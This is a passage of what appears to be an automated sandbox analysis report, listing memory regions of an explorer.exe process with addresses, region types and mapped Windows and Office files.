= 0x3e50000 end_va = 0x3e50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e50000" filename = "" Region: id = 476 start_va = 0x3e60000 end_va = 0x3e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 477 start_va = 0x3e70000 end_va = 0x3e71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e70000" filename = "" Region: id = 478 start_va = 0x3e80000 end_va = 0x3eb8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e80000" filename = "" Region: id = 479 start_va = 0x3ec0000 end_va = 0x3ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 480 start_va = 0x3ed0000 end_va = 0x3ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 481 start_va = 0x3ee0000 end_va = 0x3ee4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 482 start_va = 0x3ef0000 end_va = 0x3f37fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 483 start_va = 0x3f40000 end_va = 0x3f43fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f40000" filename = "" Region: id = 484 start_va = 0x3f50000 end_va = 0x3f51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f50000" filename = "" Region: id = 485 start_va = 0x3f60000 end_va = 0x3f63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 486 start_va = 0x3f70000 end_va = 0x3fb4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 487 start_va = 0x3fc0000 end_va = 0x3fc3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 488 start_va = 0x3fd0000 end_va = 0x405dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 489 start_va = 0x4060000 end_va = 0x40dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004060000" filename = "" Region: id = 490 start_va = 0x40e0000 end_va = 0x40e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000040e0000" filename = "" Region: id = 491 start_va = 0x40f0000 end_va = 0x40f0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{0FA68FFF-8D1F-4FCC-B2FC-0C8384CF8D69}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db") Region: id = 492 start_va = 0x4100000 end_va = 0x4103fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 493 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{3EC13D2A-C75F-4A0A-9855-0B415D40999C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db") Region: id = 494 start_va = 0x4160000 end_va = 0x4160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 495 start_va = 0x4170000 end_va = 0x41b8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004170000" filename = "" Region: id = 496 start_va = 0x41c0000 end_va = 0x41cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 497 start_va = 0x41e0000 end_va = 0x425ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 498 start_va = 0x4260000 end_va = 0x42dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 499 start_va = 0x42e0000 end_va = 0x435ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 500 start_va = 0x4360000 end_va = 0x43dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 501 start_va = 0x43e0000 end_va = 0x445ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043e0000" filename = "" Region: id = 502 start_va = 0x4460000 end_va = 0x4c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 503 start_va = 0x4c60000 end_va = 0x4cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c60000" filename = "" Region: id = 504 start_va = 0x4ce0000 end_va = 0x4ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ce0000" filename = "" Region: id = 505 start_va = 0x4de0000 end_va = 0x7161fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "appdb.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Notifications\\appdb.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\notifications\\appdb.dat") Region: id = 506 start_va = 0x7170000 end_va = 0x726ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 507 start_va = 0x7270000 end_va = 0x7761fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007270000" filename = "" Region: id = 508 start_va = 0x7790000 end_va = 0x7790fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 509 start_va = 0x77c0000 end_va = 0x77c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000077c0000" filename = "" Region: id = 510 start_va = 0x77d0000 end_va = 0x7817fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077d0000" filename = "" Region: id = 511 start_va = 0x7820000 end_va = 0x7820fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007820000" filename = "" Region: id = 512 start_va = 0x7830000 end_va = 0x7830fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007830000" filename = "" Region: id = 513 start_va = 0x7840000 end_va = 0x7841fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007840000" filename = "" Region: id = 514 start_va = 0x7850000 end_va = 0x7a08fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 515 start_va = 0x7a10000 end_va = 0x7b0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 516 start_va = 0x7b20000 end_va = 0x7b23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 517 start_va = 0x7b30000 end_va = 0x7b31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007b30000" filename = "" Region: id = 518 start_va = 0x7b90000 end_va = 0x7b91fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007b90000" filename = "" Region: id = 519 start_va = 0x7ba0000 end_va = 0x7ba1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007ba0000" filename = "" Region: id = 520 start_va = 0x7bb0000 end_va = 0x7bb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007bb0000" filename = "" Region: id = 521 start_va = 0x7be0000 end_va = 0x7be1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "inputswitch.dll.mui" filename = "\\Windows\\System32\\en-US\\InputSwitch.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inputswitch.dll.mui") Region: id = 522 start_va = 0x7bf0000 end_va = 0x7bf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007bf0000" filename = "" Region: id = 523 start_va = 0x7c40000 end_va = 0x7c41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c40000" filename = "" Region: id = 524 start_va = 0x7c50000 end_va = 0x7c51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c50000" filename = "" Region: id = 525 start_va = 0x7c60000 end_va = 0x7c60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c60000" filename = "" Region: id = 526 start_va = 0x7c70000 end_va = 0x7c70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c70000" filename = "" Region: id = 527 start_va = 0x7c80000 end_va = 0x7c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c80000" filename = "" Region: id = 528 start_va = 0x7c90000 end_va = 0x7c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c90000" filename = "" Region: id = 529 start_va = 0x7ca0000 end_va = 0x7ca1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007ca0000" filename = "" Region: id = 530 start_va = 0x7cd0000 end_va = 0x7cd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007cd0000" filename = "" Region: id = 531 start_va = 0x7ce0000 end_va = 0x7ce8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ce0000" filename = "" Region: id = 532 start_va = 0x7d70000 end_va = 0x7deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d70000" filename = "" Region: id = 533 start_va = 0x7df0000 end_va = 0x7f0cfff monitored = 0 entry_point = 0x7df1cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 534 start_va = 0x7f10000 end_va = 0x800ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 535 start_va = 0x8070000 end_va = 0x80effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008070000" filename = "" Region: id = 536 start_va = 0x8170000 end_va = 0x81effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008170000" filename = "" Region: id = 537 start_va = 0x8270000 end_va = 0x8273fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 538 start_va = 0x8280000 end_va = 0x8281fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008280000" filename = "" Region: id = 539 start_va = 0x8290000 end_va = 0x8291fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008290000" filename = "" Region: id = 540 start_va = 0x82a0000 end_va = 0x82a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082a0000" filename = "" Region: id = 541 start_va = 0x82b0000 end_va = 0x82b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082b0000" filename = "" Region: id = 542 start_va = 0x82c0000 end_va = 0x82c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082c0000" filename = "" Region: id = 543 start_va = 0x82d0000 end_va = 0x82d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082d0000" filename = "" Region: id = 544 start_va = 0x8370000 end_va = 0x83effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008370000" filename = "" Region: id = 545 start_va = 0x8470000 end_va = 0x84effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008470000" filename = "" Region: id = 546 start_va = 0x84f0000 end_va = 0x856ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084f0000" filename = "" Region: id = 547 start_va = 0x85f0000 end_va = 0x87effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085f0000" filename = "" Region: id = 548 start_va = 0x87f0000 end_va = 0x886ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087f0000" filename = "" Region: id = 549 start_va = 0x8870000 end_va = 0x89f7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 550 start_va = 0x8a20000 end_va = 0x8a20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a20000" filename = "" Region: id = 551 start_va = 0x8a30000 end_va = 0x8a38fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a30000" filename = "" Region: id = 552 start_va = 0x8a40000 end_va = 0x8b3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_32.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_32.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_32.db") Region: id = 553 start_va = 0x8bc0000 end_va = 0x8bc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008bc0000" filename = "" Region: id = 554 start_va = 0x8bd0000 end_va = 0x8c17fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008bd0000" filename = "" Region: id = 555 start_va = 0x8c20000 end_va = 0x8d1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 556 start_va = 0x8ee0000 end_va = 0x8fdffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 557 start_va = 0x9120000 end_va = 0x9120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009120000" filename = "" Region: id = 558 start_va = 0x9130000 end_va = 0x932ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009130000" filename = "" Region: id = 559 start_va = 0x93f0000 end_va = 0x946ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000093f0000" filename = "" Region: id = 560 start_va = 0x94f0000 end_va = 0x956ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000094f0000" filename = "" Region: id = 561 start_va = 0x9570000 end_va = 0x966ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 562 start_va = 0x9670000 end_va = 0x96effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009670000" filename = "" Region: id = 563 start_va = 0x96f0000 end_va = 0x9eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000096f0000" filename = "" Region: id = 564 start_va = 0x9ef0000 end_va = 0x9feffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 565 start_va = 0xa1e0000 end_va = 0xa3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1e0000" filename = "" Region: id = 566 start_va = 0xa3f0000 end_va = 0xa46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a3f0000" filename = "" Region: id = 567 start_va = 0xa470000 end_va = 0xa4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a470000" filename = "" Region: id = 568 start_va = 0xa4f0000 end_va = 0xa56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a4f0000" filename = "" Region: id = 569 start_va = 0xa770000 end_va = 0xa7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a770000" filename = "" Region: id = 570 start_va = 0xa7f0000 end_va = 0xa86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a7f0000" filename = "" Region: id = 571 start_va = 0xa870000 end_va = 0xa8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a870000" filename = "" Region: id = 572 start_va = 0xa8f0000 end_va = 0xa96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a8f0000" filename = "" Region: id = 573 start_va = 0xa970000 end_va = 0xad6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a970000" filename = "" Region: id = 574 start_va = 0xadf0000 end_va = 0xaeeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000adf0000" filename = "" Region: id = 575 start_va = 0xb1f0000 end_va = 0xb26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1f0000" filename = "" Region: id = 576 start_va = 0xb270000 end_va = 0xb2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b270000" filename = "" Region: id = 577 start_va = 0xb2f0000 end_va = 0xb36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2f0000" filename = "" Region: id = 578 start_va = 0xb470000 end_va = 0xb4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b470000" filename = "" Region: id = 579 start_va = 0xb970000 end_va = 0xc36ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b970000" filename = "" Region: id = 580 start_va = 0xc370000 end_va = 0xc861fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c370000" filename = "" Region: id = 581 start_va = 0xcd70000 end_va = 0xd261fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cd70000" filename = "" Region: id = 582 start_va = 0xd270000 end_va = 0xd761fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d270000" filename = "" Region: id = 583 start_va = 0xf7f0000 end_va = 0xf86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f7f0000" filename = "" Region: id = 584 start_va = 0xf870000 end_va = 0xf8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f870000" filename = "" Region: id = 585 start_va = 0xf8f0000 end_va = 0xf96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f8f0000" filename = "" Region: id = 586 start_va = 0xf970000 end_va = 0xf9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f970000" filename = "" Region: id = 587 start_va = 0xf9f0000 end_va = 0xfa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f9f0000" filename = "" Region: id = 588 start_va = 0xfa70000 end_va = 0xfaeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fa70000" filename = "" Region: id = 589 start_va = 0xfaf0000 end_va = 0xfb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000faf0000" filename = "" Region: id = 590 start_va = 0xfb70000 end_va = 0xfbeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb70000" filename = "" Region: id = 591 start_va = 0xfbf0000 end_va = 0xfc6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fbf0000" filename = "" Region: id = 592 start_va = 0xfc70000 end_va = 0xfceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fc70000" filename = "" Region: id = 593 start_va = 0xfdf0000 end_va = 0xfe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fdf0000" filename = "" Region: id = 594 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 595 start_va = 0x180000000 end_va = 0x18087dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 596 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 597 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 598 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 599 start_va = 0x7ff6a2500000 end_va = 0x7ff6a2947fff monitored = 0 entry_point = 0x7ff6a259e090 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 600 start_va = 0x7ffb0bae0000 end_va = 0x7ffb0c7acfff monitored = 0 entry_point = 0x7ffb0bc2e880 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 601 start_va = 0x7ffb0c970000 end_va = 0x7ffb0c97ffff monitored = 0 entry_point = 0x7ffb0c973d50 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 602 start_va = 0x7ffb0d300000 end_va = 0x7ffb0d308fff monitored = 0 entry_point = 0x7ffb0d301b60 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 603 start_va = 0x7ffb0e410000 end_va = 0x7ffb0e45ffff monitored = 0 entry_point = 0x7ffb0e441220 region_type = mapped_file name = "windows.system.launcher.dll" filename = "\\Windows\\System32\\Windows.System.Launcher.dll" (normalized: "c:\\windows\\system32\\windows.system.launcher.dll") Region: id = 604 start_va = 0x7ffb0f450000 end_va = 0x7ffb0f590fff monitored = 0 entry_point = 0x7ffb0f455f70 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 605 start_va = 0x7ffb0f5a0000 end_va = 0x7ffb0f6c0fff monitored = 0 entry_point = 0x7ffb0f5a1cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 606 start_va = 0x7ffb0f800000 end_va = 0x7ffb0f89ffff monitored = 0 entry_point = 0x7ffb0f870910 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 607 start_va = 0x7ffb0f9f0000 end_va = 0x7ffb0fd35fff monitored = 0 entry_point = 0x7ffb0f9f8530 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 608 start_va = 0x7ffb0fd40000 end_va = 0x7ffb0fefffff monitored = 0 entry_point = 0x7ffb0fd49e40 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 609 start_va = 0x7ffb0ff00000 end_va = 0x7ffb0ff87fff monitored = 0 entry_point = 0x7ffb0ff14510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 610 start_va = 0x7ffb0ff90000 end_va = 0x7ffb101d2fff monitored = 0 entry_point = 0x7ffb0ff936c0 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 611 start_va = 0x7ffb10260000 end_va = 0x7ffb102d8fff monitored = 0 entry_point = 0x7ffb102622d0 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 612 start_va = 0x7ffb102e0000 end_va = 0x7ffb1035afff monitored = 0 entry_point = 0x7ffb102e3af0 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 613 start_va = 0x7ffb10360000 end_va = 0x7ffb104b9fff monitored = 0 entry_point = 0x7ffb10364610 region_type = mapped_file name = "windows.ui.shell.dll" filename = "\\Windows\\System32\\Windows.UI.Shell.dll" (normalized: "c:\\windows\\system32\\windows.ui.shell.dll") Region: id = 614 start_va = 0x7ffb104c0000 end_va = 0x7ffb106bdfff monitored = 0 entry_point = 0x7ffb104c16c0 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 615 start_va = 0x7ffb10750000 end_va = 0x7ffb1076ffff monitored = 0 entry_point = 0x7ffb10751920 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 616 start_va = 0x7ffb10770000 end_va = 0x7ffb10785fff monitored = 0 entry_point = 0x7ffb10773380 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 617 start_va = 0x7ffb10790000 end_va = 0x7ffb107bdfff monitored = 0 entry_point = 0x7ffb10796580 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 618 start_va = 0x7ffb10a20000 end_va = 0x7ffb10a6ffff monitored = 0 entry_point = 0x7ffb10a2be50 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 619 start_va = 0x7ffb10a70000 end_va = 0x7ffb10ad3fff monitored = 0 entry_point = 0x7ffb10a76b20 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 620 start_va = 